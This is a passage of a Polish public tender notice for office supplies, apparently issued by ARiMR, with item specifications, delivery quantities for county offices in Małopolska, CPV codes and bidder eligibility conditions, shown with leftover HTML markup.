archiwizacyjne pełne boxy (8*25*35)	Wykonane z twardej tektury falistej, po złożeniu stabilne i trwałe, dostosowane do przechowywania dokumentów formatu A4 spiętych w teczki archiwizacyjne, posiadające otwór na palec ułatwiający wkładanie i wyjmowanie pojemnika z półki, miejsce do opisu zawartości pojemnika na grzbiecie, dłuższa zakładka na grzbiecie uniemożliwiająca samodzielne otwieranie (wymiary zewnętrzne po złożeniu: głębokość 250 mm, szerokość 80 mm, wysokość 350 mm)	Szt.	850051	Pudło arch. na płyty CD (białe/czarne)	Wykonane z kartonu z pokrywą. Pojemność ok. 30 CD w szerokich pudełkach lub ok. 60 CD w płaskich pudełkach lub ok. 165 CD w papierowych kieszeniach Szt.	4052	Segregator A4/75 kolor	Do codziennego użytku w biurze, wykonany z twardej tektury pokrytej folią, z mechanizmem dźwigniowym, kolory dowolne, na grzbiecie miejsce na wsuwaną etykietę i otwór na palec do wysuwania z półki	Szt.	450053	Skoroszyt zawieszkowy plastikowy	Wykonany z polipropylenu, strona przednia transparentna, strona tylna kolorowa, wymienny pasek brzegowy, format A4, opak. minimum 20 szt.	Op.	15054	Taśma klejąca wąska	Przeźroczysta na rolce, samoprzylepna z możliwością pisania po niej, nie żółknąca z upływem czasu, średnica wewnętrzna taśmy 26 mm	Szt.	20055	Teczka z gumką 15mm cienka (kolorowa)	Wykonana z grubego kartonu (min 350g/m?)	Szt.	10056	Teczka z gumką 40 mm	Wykonana z grubego kartonu (min 350g/m?)	Szt.	6057	Tusz do stempli czarny	Uniwersalny tusz wodny do papieru i dokumentów, przeznaczony do stempli i automatów samotuszujących, do stempli z gumową lub polimerową płytką stemplującą, pojemność buteleczki minimum 25 ml	Szt.	6058	Tusz do stempli zielony	Uniwersalny tusz wodny do papieru i dokumentów, przeznaczony do stempli i automatów samotuszujących, do stempli z gumową lub polimerową płytką stemplującą, pojemność buteleczki minimum 25 ml	Szt.	20059	Zakreślacz tekstu pojedynczy	Kolor żółty, przeznaczony do wszystkich rodzajów papieru, odporny na wysychanie, płaski kształt i wygodny klips, szeroka końcówka minimum 3 mm, obudowa i klips w kolorze tuszu	Szt.	30060	Zszywacz biurowy duży 100kartek	Zszywacz metalowy do 100 kartek, o dużej wytrzymałości, stabilna podstawa, głębokość zszywania max. 69 mm, wyposażony w długie ramię ułatwiające pracę i znacznie ograniczające użycie siły potrzebnej do zszycia wielu kartek na zszywki 23/6, 23/8, 23/10, 23/13, 23/15	Szt.	1561	Zszywacz biurowy duży 240kartek	Zszywacz metalowy do 240 kartek, o dużej wytrzymałości, stabilna podstawa, głębokość zszywania max. 65 mm, wyposażony w długie ramię ułatwiające pracę i znacznie ograniczające użycie siły potrzebnej do zszycia wielu kartek na zszywki 23/6, 23/8, 23/10, 23/13, 23/15, 23/17, 23/20, 23/25	Szt.	562	Zszywacz biurowy średni ok. 25 kartek	Obudowa wykonana z metalu obudowanego trwałym plastikiem, usztywnione prowadzenie zszywek, możliwość obrotu końcówki zszywającej, na zszywki 24/6 i 26/6, możliwość zszywania do 25 kartek jednorazowo, głębokość wsuwania kartki minimum 55 mm, 5 lat gwarancji	Szt.	15063	Zwilżacz glicerynowy	Zwilżacz glicerynowy do palców, bezzapachowy, bezbarwny, antybakteryjny, opakowanie min 20 ml	Szt.	5064	Teczki akt osobowych grube 45-50 mm	Wykonana z folii PCV, wyposażona w mechanizm 2-ringowy, na grzbiecie kieszeń na dane personalne, grzbiet 45-50 mm, z wkładem A B C	Szt.	20065	Przybornik na biurko	Pojemnik na podręczną galanterię biurową pozwalającą na organizację pracy na biurku	Szt.	10066	Kalkulator biurowy	wyświetlacz 12 pozycji, podwójne zasilanie, trwała plastikowa obudowa	Szt.	10067	Kalkulator 12-pozycyjny	12-pozycyjny wyświetlacz LCD. Obliczenia podatkowe. Obliczanie marży. Podwójna pamięć. Zaokrąglanie wyników. Tabulacja. Cofanie ostatnio wprowadzonej pozycji. Klawisz sumy całkowitej, podwójnego zera. Prędkość druku: minimum 2,7 linii/sek. Papier 58 mm. 2-kolorowa drukarka. Zasilanie sieciowe. Szt.	468	,,białe zwrotki"	Zwrotne potwierdzenie odbioru na zasadach KPA (Tekst jednolity Dz. U. z 2016 r. poz. 23 późn. zm.) samoprzylepne min. 2.000 szt. w opakowaniu	Op. 7069	Taśma -poduszka tuszowa do kalkulatora CITIZEN CX 123H Szt.	2170	podkładka do dziurkacza archiwizacyjnego Bin 2100 op. minimum 10 szt Op.	271	Podkładka na biurko Podkładka na biurko z planerem tygodniowym, kalendarzem 590/420mm (format A2)	Szt.	3072	etykiety samoprzylepne przeźroczyste do drukarek laserowych A4 od 21-27 szt na arkuszu (przeźroczyste folie samoprzylepne), min. 25 ark. w op.	Op.	573	Papier ozdobny 100g/m2	Papier tłoczony i matowy, faktura płótna, polecany do drukarek laserowych i atramentowych, opakowanie minimum 50ark. A4	Op.	274	Papier ozdobny biały120 g/m2	Papier tłoczony i matowy, faktura żeberkowa, polecany do drukarek laserowych i atramentowych, opakowanie minimum 50ark. A4	Op.	275	Papier ozdobny kremowy 120 g/m2	Papier tłoczony i matowy, faktura żeberkowa, polecany do drukarek laserowych i atramentowych, opakowanie minimum 50ark. A4	Op.	276	Papier ozdobny biały 100 g/m2	Papier gładki i metalizowany, polecany do drukarek laserowych i atramentowych, opakowanie minimum 50ark. A4	Op.	277	Papier ozdobny kremowy 100 g/m2	Papier gładki i metalizowany, polecany do drukarek laserowych i atramentowych, opakowanie minimum 50ark. A4	Op.	278	Dyplom 170g/m2	Najwyższej jakości papier do drukarek atramentowych i laserowych, opakowanie minimum 25ark. A4	Op.	379	Papier 135 g/m2	Papier do kolorowych laserowych urządzeń kopiujących oraz kolorowych drukarek laserowych. Bezdrzewny, w kolorze białym, nadaje się do wydruków kolorowych jak również do wydruków monochromatycznych, minimum 250 arkuszy w opakowaniu.	Op.	102. Użyty w opisie przedmiotu zamówienia termin ,,opakowanie" oraz podana liczba sztuk, które opakowanie to obejmuje służy jedynie prawidłowemu wyliczeniu ceny. Przy dostawie Zamawiający nie wymaga, aby liczba sztuk w opakowaniu odpowiadała dokładnie liczbie określonej w opisie przedmiotu zamówienia, a jedynie by liczba sztuk odpowiadała ich sumie całkowitej wynikającej z opisu przedmiotu zamówienia.3. Wykonawca jest zobowiązany do stosowania nazewnictwa lub nr pozycji asortymentu z w/w opisu przedmiotu zamówienia przy wystawianiu faktur. 4. Zamawiający wymaga, aby dostawa asortymentu określonego w przedmiocie zamówienia dokonywana była w sposób umożliwiający natychmiastowe sprawdzenie stanu ilościowego i jakościowego, w szczególności poprzez zapewnienie właściwego opakowania.5. Wykonawca zobowiązany będzie do dostarczenia wskazanego poniżej asortymentu i w ilościach tam określonych do następujących lokalizacji:Lp.	Powiat	Adres placówki	Koszulki (100 szt. w op.) poz. 27	Koszulki maxi (25 szt. w op.) poz.28	Teczka A4 do 5cm (szt.)Poz.40	Papier A4 (ryza) poz.47	Pudła archiwizacyjne (szt.) poz.49	Pudła Boxy (szt.) poz.50	Segregatory (szt.) poz.52	Białe zwrotki (op. 2000szt) poz.681	Bocheński	32-700 Bochnia, ul. Windakiewicza 9/1	50	30	300	300	50	600	280	32	Brzeski	32-800 Brzesko, ul. Szczepanowska 23 4.000	75 13	Chrzanowski	32-500 Chrzanów, ul. Fabryczna 16	800	700	2.200	1.525	900	450	1.820	144	Dąbrowski	32-200 Dąbrowa Tarnowska, ul. Piłsudskiego 33	80 9.000	50 50	50	45	Gorlicki	38-300 Gorlice, ul. W. Pola 2	90 150 56	Krakowski	31-503 Kraków, ul. Lubicz 25	200	100 600	1.100 7	Limanowski	34-600 Limanowa, ul. Piłsudskiego 6	90 20.000 4.000	5.000	250	28	Miechowski	32-200 Miechów, ul. Konopnickiej 23 a	100 400	400	300	39	Myślenicki	32-400 Myślenice, ul. Słowackiego 100A	30 3.000	150 200	310	Nowosądecki	33-300 Nowy Sącz, ul. Kraszewskiego 44	90 300 200	400	411	Nowotarski	34-400 Nowy Targ, ul. Składowa 7	200	40 500	812	Olkuski	32-300 Olkusz, ul. Bylicy 1	20 313	Oświęcimski	32-602 Oświęcim, ul. Wyspiańskiego 10 114	Proszowicki	32-100 Proszowice, ul. Krakowska 32	80 200 200	315	Suski	34-200 Sucha Beskidzka, ul. Mickiewicza 19	30	50 200	116	Tarnowski	33-100 Tarnów, ul. Krakowska 134	50 300	50	500	50	517	Tatrzański	34-500 Zakopane, ul. Do Samków 29	50 1.500	100 50	50	618	Wadowicki	34-100 Wadowice, ul. Mickiewicza 36	40 200	319	Wielicki	32-005 Niepołomice, ul. 3 Maja 2 80 1? 2.000	1.000	40.000	3.000	6.000	8.500	4.500	706. Pozostały asortyment dostarczony zostanie do siedziby Biura Powiatowego Zamawiającego w Chrzanowie, przy ul. Fabrycznej 16.7. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. W przypadku realizacji przedmiotu zamówienia z wykorzystaniem podwykonawców, Zamawiający żąda wskazania przez Wykonawcę tych części zamówienia, których wykonanie powierzy podwykonawcom oraz podania firm podwykonawców. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">30192221-5</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192100-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30197300-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30141200-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>24910000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30237430-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192130-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30234300-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30199500-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30197200-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192133-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39292500-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>22600000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30124400-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30197130-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192800-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192800-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192800-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44617100-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30199230-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>22000000-0</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">0,00</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'>28</TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">W przypadku dostawy pudeł archiwizacyjnych termin dostawy wynosi 6 tygodni (42 dni) od dnia zawarcia umowy.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">W odniesieniu do warunków udziału w postępowaniu dotyczących sytuacji finansowej lub ekonomicznej Zamawiający wymaga, aby Wykonawca posiadał ubezpieczenie od odpowiedzialności cywilnej, w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 20 000 PLN.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">W odniesieniu do warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający wymaga, aby Wykonawca spełniał minimalne warunki umożliwiające realizację zamówienia na odpowiednim poziomie jakości, a dotyczące jego doświadczenia tj. Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej jedną dostawę materiałów biurowych lub papieru kserograficznego o wartości minimum 50 000 PLN brutto (dotyczy jednego kontraktu).</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1. W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu zamawiający będzie wymagał następujących dokumentów:a) oświadczenia wykonawcy (wg. wzoru stanowiącego Załącznik nr 5 do SIWZ) o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji - dokumentów potwierdzających dokonanie płatności tych należności lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;b) odpisu z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust.5 pkt.1 ustawy PZP.2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:a)	zamiast dokumentu o którym mowa w pkt. 1 b) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.b)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy nie wydaje się dokumentów, o których mowa w pkt. 2 a) zastępuje się je dokumentem zawierającym oświadczenie, odpowiednio wykonawcy, ze wskazaniem osoby lub osób uprawnionych do jego reprezentacji, lub oświadczeniem osoby, dokument miał dotyczyć złożonym przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwego ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Zapisy pkt. 2 a) dotyczące terminu wydania dokumentów lub oświadczeń stosuje się.3.	Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej Zamawiającego (www.arimr.gov.pl) informacji, o której mowa w art. 86 ust.5 ustawy Pzp przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której stanowi art, 23 ust. 1 ustawy. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Oświadczenie to należy złożyć zgodnie ze wzorem stanowiącym Załącznik nr 6 do SWIZ</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1)	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej zamawiający będzie wymagał złożenia dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego dokumentów, o których mowa w pkt. 1, zamawiający dopuszcza złożenie przez wykonawcę innych dokumentów w celu potwierdzenia spełniania warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej wykonawcy),2)	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej zamawiający będzie wymagał złożenia (sporządzonego wg. wzoru stanowiącego Załącznik nr 4 do SIWZ) wykazu dostaw wykonanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy (Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego dokumentów, o których mowa w pkt. 2 zamawiający może dopuścić złożenie przez wykonawcę innych odpowiednich dokumentów w celu potwierdzenia spełniania warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej).</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz 